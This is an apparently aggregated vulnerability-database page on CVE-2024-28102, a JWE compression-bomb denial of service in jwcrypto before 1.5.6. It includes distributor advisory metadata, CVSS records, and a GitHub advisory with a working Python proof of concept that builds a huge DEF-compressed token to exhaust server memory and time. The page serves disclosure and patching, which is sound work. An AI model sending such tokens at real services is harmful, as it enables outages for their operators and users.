"url": "https://access.redhat.com/errata/RHSA-2024:2988"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2968 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2968"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2961 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2961"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2952 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2952"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3102 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:3102"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2987 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2987"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3267 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3264 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:3264"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3321 vom 2024-05-23",
"url": "https://access.redhat.com/errata/RHSA-2024:3321"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3322 vom 2024-05-23",
"url": "https://access.redhat.com/errata/RHSA-2024:3322"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3323 vom 2024-05-23",
"url": "https://access.redhat.com/errata/RHSA-2024:3323"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3324 vom 2024-05-23",
"url": "https://access.redhat.com/errata/RHSA-2024:3324"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3325 vom 2024-05-23",
"url": "https://access.redhat.com/errata/RHSA-2024:3325"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-2987 vom 2024-05-28",
"url": "https://linux.oracle.com/errata/ELSA-2024-2987.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3392 vom 2024-05-28",
"url": "https://access.redhat.com/errata/RHSA-2024:3392"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-2961 vom 2024-05-28",
"url": "https://linux.oracle.com/errata/ELSA-2024-2961.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-3264 vom 2024-05-30",
"url": "http://linux.oracle.com/errata/ELSA-2024-3264.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-3267 vom 2024-06-01",
"url": "https://linux.oracle.com/errata/ELSA-2024-3267.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:4522 vom 2024-07-12",
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2024:3976-1 vom 2024-11-12",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2024-November/019809.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:11189 vom 2024-12-17",
"url": "https://access.redhat.com/errata/RHSA-2024:11189"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:11238 vom 2024-12-17",
"url": "https://access.redhat.com/errata/RHSA-2024:11238"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-11238 vom 2024-12-19",
"url": "https://linux.oracle.com/errata/ELSA-2024-11238.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:0078 vom 2025-01-08",
"url": "https://access.redhat.com/errata/RHSA-2025:0078"
}
],
"source_lang": "en-US",
"title": "Red Hat Enterprise Linux: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-01-07T23:00:00.000+00:00",
"generator": {
"date": "2025-01-08T10:42:29.202+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.10"
}
},
"id": "WID-SEC-W-2024-1003",
"initial_release_date": "2024-05-01T22:00:00.000+00:00",
"revision_history": [
{
"date": "2024-05-01T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2024-05-07T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2024-05-09T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2024-05-21T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-05-22T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-05-28T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Oracle Linux und Red Hat aufgenommen"
},
{
"date": "2024-05-30T22:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2024-06-02T22:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2024-07-11T22:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-11-11T23:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2024-12-16T23:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-12-19T23:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2025-01-07T23:00:00.000+00:00",
"number": "13",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "13"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Oracle Linux",
"product": {
"name": "Oracle Linux",
"product_id": "T004914",
"product_identification_helper": {
"cpe": "cpe:/o:oracle:linux:-"
}
}
}
],
"category": "vendor",
"name": "Oracle"
},
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_version_range",
"name": "\u003c9",
"product": {
"name": "Red Hat Enterprise Linux \u003c9",
"product_id": "T030284"
}
},
{
"category": "product_version",
"name": "9",
"product": {
"name": "Red Hat Enterprise Linux 9",
"product_id": "T030284-fixed",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:9"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-45803",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten urllib3 und python-jwcrypto aufgrund einer fehlenden Bereinigung des HTTP-Anfragek\u00f6rpers und eines unkontrollierten Ressourcenverbrauchs. Ein benachbarter oder entfernter, authentifizierter Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2023-45803"
},
{
"cve": "CVE-2024-28102",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten urllib3 und python-jwcrypto aufgrund einer fehlenden Bereinigung des HTTP-Anfragek\u00f6rpers und eines unkontrollierten Ressourcenverbrauchs. Ein benachbarter oder entfernter, authentifizierter Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2024-28102"
},
{
"cve": "CVE-2023-52323",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten pycryptodomex, Jinja2 und PCP aufgrund eines Lecks in einem Seitenkanal, einer unsachgem\u00e4\u00dfen Eingabevalidierung und der Offenlegung des Redis-Servers. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Cross-Site Scripting (XSS)-Angriffe durchzuf\u00fchren oder vertrauliche Informationen offenzulegen. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2023-52323"
},
{
"cve": "CVE-2024-22195",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten pycryptodomex, Jinja2 und PCP aufgrund eines Lecks in einem Seitenkanal, einer unsachgem\u00e4\u00dfen Eingabevalidierung und der Offenlegung des Redis-Servers. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Cross-Site Scripting (XSS)-Angriffe durchzuf\u00fchren oder vertrauliche Informationen offenzulegen. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2024-22195"
},
{
"cve": "CVE-2024-3019",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten pycryptodomex, Jinja2 und PCP aufgrund eines Lecks in einem Seitenkanal, einer unsachgem\u00e4\u00dfen Eingabevalidierung und der Offenlegung des Redis-Servers. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Cross-Site Scripting (XSS)-Angriffe durchzuf\u00fchren oder vertrauliche Informationen offenzulegen. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2024-3019"
},
{
"cve": "CVE-2023-45897",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten osbuild-composer und Exfatprogs aufgrund einer Race Condition und eines Out-of-Bound-Read-Problems. Ein lokaler Angreifer kann diese Schwachstellen ausnutzen, um einen Man-in-the-Middle-Angriff durchzuf\u00fchren oder um Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2023-45897"
},
{
"cve": "CVE-2024-2307",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten osbuild-composer und Exfatprogs aufgrund einer Race Condition und eines Out-of-Bound-Read-Problems. Ein lokaler Angreifer kann diese Schwachstellen ausnutzen, um einen Man-in-the-Middle-Angriff durchzuf\u00fchren oder um Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2024-2307"
}
]
}
ghsa-j857-7rvv-vj97
Vulnerability from github
Affected version
Vendor: https://github.com/latchset/jwcrypto Version: 1.5.5
Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this Token, it will consume a lot of memory and processing time.
Poc
```python from jwcrypto import jwk, jwe from jwcrypto.common import json_encode, json_decode import time public_key = jwk.JWK() private_key = jwk.JWK.generate(kty='RSA', size=2048) public_key.import_key(**json_decode(private_key.export_public()))
payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}' protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "zip": "DEF", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode('utf-8'), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True)
print("-----uncompress-----")
print(len(enc))
begin = time.time()
jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key)
print(time.time() - begin)
print("-----compress-----")
payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}' protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode('utf-8'), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True)
print(len(enc))
begin = time.time()
jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key)
print(time.time() - begin)
```
It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.
Mitigation
To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing attackers from exploiting this vulnerability with high compression ratio tokens.
References
[1] CVE-2024-21319
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.5.5"
},
"package": {
"ecosystem": "PyPI",
"name": "jwcrypto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-28102"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2024-03-06T20:00:56Z",
"nvd_published_at": "2024-03-21T02:52:23Z",
"severity": "MODERATE"
},
"details": "## Affected version\nVendor: https://github.com/latchset/jwcrypto\nVersion: 1.5.5\n\n## Description\nAn attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.\nWhen the server processes this Token, it will consume a lot of memory and processing time.\n\n## Poc\n```python\nfrom jwcrypto import jwk, jwe\nfrom jwcrypto.common import json_encode, json_decode\nimport time\npublic_key = jwk.JWK()\nprivate_key = jwk.JWK.generate(kty=\u0027RSA\u0027, size=2048)\npublic_key.import_key(**json_decode(private_key.export_public()))\n\n\npayload = \u0027{\"u\": \"\u0027 + \"u\" * 400000000 + \u0027\", \"uu\":\"\u0027 + \"u\" * 400000000 + \u0027\"}\u0027\nprotected_header = {\n \"alg\": \"RSA-OAEP-256\",\n \"enc\": \"A256CBC-HS512\",\n \"typ\": \"JWE\",\n \"zip\": \"DEF\",\n \"kid\": public_key.thumbprint(),\n}\njwetoken = jwe.JWE(payload.encode(\u0027utf-8\u0027),\n recipient=public_key,\n protected=protected_header)\nenc = jwetoken.serialize(compact=True)\n\nprint(\"-----uncompress-----\")\n\nprint(len(enc))\n\nbegin = time.time()\n\njwetoken = jwe.JWE()\njwetoken.deserialize(enc, key=private_key)\n\nprint(time.time() - begin)\n\nprint(\"-----compress-----\")\n\npayload = \u0027{\"u\": \"\u0027 + \"u\" * 400000 + \u0027\", \"uu\":\"\u0027 + \"u\" * 400000 + \u0027\"}\u0027\nprotected_header = {\n \"alg\": \"RSA-OAEP-256\",\n \"enc\": \"A256CBC-HS512\",\n \"typ\": \"JWE\",\n \"kid\": public_key.thumbprint(),\n}\njwetoken = jwe.JWE(payload.encode(\u0027utf-8\u0027),\n recipient=public_key,\n protected=protected_header)\nenc = jwetoken.serialize(compact=True)\n\nprint(len(enc))\n\nbegin = time.time()\n\njwetoken = jwe.JWE()\njwetoken.deserialize(enc, key=private_key)\n\nprint(time.time() - begin)\n```\nIt can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.\n\u003cimg width=\"172\" alt=\"image\" src=\"https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785\"\u003e\n\n\n\n## Mitigation\nTo mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also\nbeen adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing\nattackers from exploiting this vulnerability with high compression ratio tokens.\n\n## References\n[1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)\n",
"id": "GHSA-j857-7rvv-vj97",
"modified": "2024-03-21T18:29:26Z",
"published": "2024-03-06T20:00:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"type": "WEB",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"type": "PACKAGE",
"url": "https://github.com/latchset/jwcrypto"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "JWCrypto vulnerable to JWT bomb Attack in `deserialize` function"
}
gsd-2024-28102
Vulnerability from gsd
{
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2024-28102"
],
"details": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.",
"id": "GSD-2024-28102",
"modified": "2024-03-05T06:02:29.205231Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2024-28102",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "jwcrypto",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "\u003c 1.5.6"
}
]
}
}
]
},
"vendor_name": "latchset"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length."
}
]
},
"impact": {
"cvss": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-770",
"lang": "eng",
"value": "CWE-770: Allocation of Resources Without Limits or Throttling"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"refsource": "MISC",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"name": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"refsource": "MISC",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
}
]
},
"source": {
"advisory": "GHSA-j857-7rvv-vj97",
"discovery": "UNKNOWN"
}
},
"nvd.nist.gov": {
"cve": {
"descriptions": [
{
"lang": "en",
"value": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length."
},
{
"lang": "es",
"value": "JWCrypto implementa las especificaciones JWK, JWS y JWE utilizando criptograf\u00eda Python. Antes de la versi\u00f3n 1.5.6, un atacante pod\u00eda provocar un ataque de denegaci\u00f3n de servicio al pasar un token JWE malicioso con una alta tasa de compresi\u00f3n. Cuando el servidor procese este token, consumir\u00e1 mucha memoria y tiempo de procesamiento. La versi\u00f3n 1.5.6 corrige esta vulnerabilidad limitando la longitud m\u00e1xima del token."
}
],
"id": "CVE-2024-28102",
"lastModified": "2024-03-21T12:58:51.093",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 4.0,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2024-03-21T02:52:23.513",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
}
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.